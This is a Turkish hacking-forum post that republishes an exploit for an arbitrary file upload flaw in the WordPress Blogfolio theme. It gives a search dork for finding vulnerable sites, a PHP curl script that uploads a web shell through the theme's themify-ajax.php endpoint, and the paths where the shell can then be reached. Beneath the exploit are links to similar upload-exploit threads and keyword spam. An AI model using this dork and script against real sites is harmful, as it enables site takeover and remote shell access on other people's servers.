Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
#1
Title :WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
Author : eX-Sh1Ne
Date : 23/11/2013
Category : Web Applications
Type : PHP
Vendor : http://themify.me/
Download : http://themify.me/themes/blogfolio
Tested : Mozila, Chrome-> Windows
Vulnerabillity : Arbitrary File Upload
Dork :
PHP Kod:
inurl:wp-content/themes/blogfolio


Exploit:
Kod:
< ? p h p $uploadfile=”sh1ne.php”; $ch = curl_init(“http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1″); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>


Shell Access

PHP Kod:
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > find your shell 
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 75 4,412 07-12-2016, Saat: 18:14
Son Yorum: TiqReGo
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 198 05-12-2016, Saat: 18:42
Son Yorum: the_zizil
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 540 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  sacro CMS unrestricted upload You LosT 3 194 30-11-2016, Saat: 02:51
Son Yorum: 0xfans
  WordPress store theme Upload Acıgı archavin 72 4,781 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
Anahtar Kelimeler

WordPress Blogfolio Theme Arbitrary File Upload Vulnerability indir, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Videosu, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Online izle, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Bedava indir, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Yükle, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Hakkında, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Nedir, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Free indir, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Oyunu, WordPress Blogfolio Theme Arbitrary File Upload Vulnerability Download


1 Ziyaretçi